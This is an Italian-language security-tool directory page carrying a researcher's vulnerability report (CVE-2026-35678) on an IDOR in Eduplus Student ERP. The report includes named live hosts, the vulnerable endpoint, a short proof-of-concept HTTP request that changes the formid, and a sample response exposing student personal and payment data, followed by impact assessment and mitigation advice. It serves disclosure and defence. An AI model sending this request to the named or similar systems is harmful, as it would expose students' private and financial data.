Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-35678 — Rapporto dettagliato di ricerca sulle vulnerabilità riguardante un IDOR in Eduplus Student ERP, inclusa analisi tecnica, PoC, valutazione dell'impatto e raccomandazioni per la mitigazione. | Kitploit
Strumenti/GitHubGitHub/sharma19d/cve-2026-35678
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebPenetration Testing
GitHubsharma19d/cve-2026-35678

CVE-2026-35678

Rapporto dettagliato di ricerca sulle vulnerabilità riguardante un IDOR in Eduplus Student ERP, inclusa analisi tecnica, PoC, valutazione dell'impatto e raccomandazioni per la mitigazione.

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Rapporto di Ricerca sulle Vulnerabilità: Insecure Direct Object Reference (IDOR) Universale in Eduplus Student ERP

Ricercatore: Vinay Sharma

1. Sintesi Esecutiva

Questo rapporto descrive una vulnerabilità di sicurezza ad alta gravità identificata nella piattaforma Eduplus Student ERP, in particolare nel portale dello studente (learnerapi.pceterp.in). L'applicazione presenta una Insecure Direct Object Reference (IDOR) Universale sull'endpoint di invio dei moduli d'esame, che consente a qualsiasi utente autenticato (studente) di recuperare i dati personali e finanziari sensibili di qualsiasi altro studente manipolando gli identificativi dei moduli.

La vulnerabilità consente la raccolta su larga scala dei dati degli studenti, inclusi i Dati Personali Identificativi (PII) e le tracce dettagliate di audit delle transazioni finanziarie.


2. Dettagli della Vulnerabilità

  • Host di Destinazione: learnerapi.pceterp.in, learner.zealerp.in, ecc.
learner.despu.edu.in
  • Endpoint Interessato: POST /ExamForm/viewSubmitExamForm
  • Tipi di Vulnerabilità:
    • Insecure Direct Object Reference (IDOR) [CWE-639]
    • Crittografia Debole (AES-ECB con Chiave Hardcoded) [CWE-327, CWE-798]
    • Esposizione di Dati Sensibili [CWE-312]
  • Gravità: Alta (CVSS v3.1 Stimato: 7.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

  • 3. Analisi Tecnica

    3.1 Insecure Direct Object Reference (IDOR)

    La vulnerabilità risiede nell'endpoint viewSubmitExamForm. Il server si basa su due parametri forniti dal client per identificare il record da recuperare:

    1. Corpo della Richiesta: {"formid": "XXXXX"}
    2. Intestazione HTTP: Router-Path: /view-pcu-exam-form/XXXXX

    Sebbene l'utente debba essere autenticato, il server non verifica se lo studente autenticato è autorizzato a visualizzare i dati associati al formid richiesto. Iterando attraverso gli ID numerici, un attaccante può accedere ai record di altri studenti.

    4. Prova di Concetto (PoC)

    4.1 Sfruttamento dell'IDOR

    Una richiesta POST standard all'endpoint vulnerabile con un formid modificato restituisce dati sensibili dello studente.

    Richiesta:

    root@kitploit:~
    POST /ExamForm/viewSubmitExamForm HTTP/2
    Host: learnerapi.pceterp.in
    Content-Type: application/json
    Router-Path: /view-pcu-exam-form/28984
    ... (Intestazioni Autenticate) ...
    
    {"formid":"28984"}
    

    Risposta (Riepilogo dei Dati Divulgati):

    root@kitploit:~
    {
      "status": "200",
      "examFormname": "B.Tech - Sem VI - Regular",
      "receipt_no": "REC/2023/54321",
      "feespaiddate": "2023-10-15",
      "ispaymentdone": {
        "username": "[email protected]",
        "received_amount": "1500.0",
        "updation_ip_address": "103.x.x.x",
        "erp_transaction_id": "ERP_998877",
        "bank_transaction_id": "BANK_ABC123",
        "paymentgateway_transaction_id": "PG_XYZ789",
        "learner": {
          "id": "12345"
        }
      }
    }
    
    5
    4
    3
    2
    1

    Caricamento di Idorpoc.mp4…


    5. Valutazione dell'Impatto

    Lo sfruttamento riuscito di questa vulnerabilità consente di:

    • Esposizione Massiva di PII: Accesso a nomi, indirizzi email, ID studente e indirizzi IP di accesso dell'intera popolazione studentesca.
    • Violazione dei Dati Finanziari: Esposizione della cronologia delle transazioni, ID bancari e riferimenti al gateway di pagamento. Queste informazioni sono altamente sensibili e potrebbero essere utilizzate per ingegneria sociale finanziaria o frodi.
    • Violazione della Privacy Accademica: Accesso non autorizzato ai moduli d'esame, alle assegnazioni dei mentori e agli stati di invio.

    6. Raccomandazioni per la Mitigazione

    6.1 Correzione dell'Autorizzazione (Priorità: Alta)

    • Implementare Controlli di Autorizzazione Lato Server: Il backend deve verificare che il formid richiesto appartenga al learnerid associato alla sessione attiva. Non fidarsi mai dei parametri formid o Router-Path senza validazione rispetto al token di sessione autenticato.

    6.3 Indurimento Generale

    • Minimizzare l'Output dei Dati: Assicurarsi che l'API restituisca solo i campi necessari per la specifica vista UI. Gli ID di transazione interni e gli indirizzi IP dovrebbero essere oscurati a meno che non siano assolutamente necessari per il flusso di lavoro dell'utente.
    • Sicurezza della Sessione: Rivedere l'uso di intestazioni crittografate personalizzate per la gestione delle sessioni e considerare l'adozione di JWT standard e induriti o cookie sicuri HTTP-only.
    Scarica lo strumento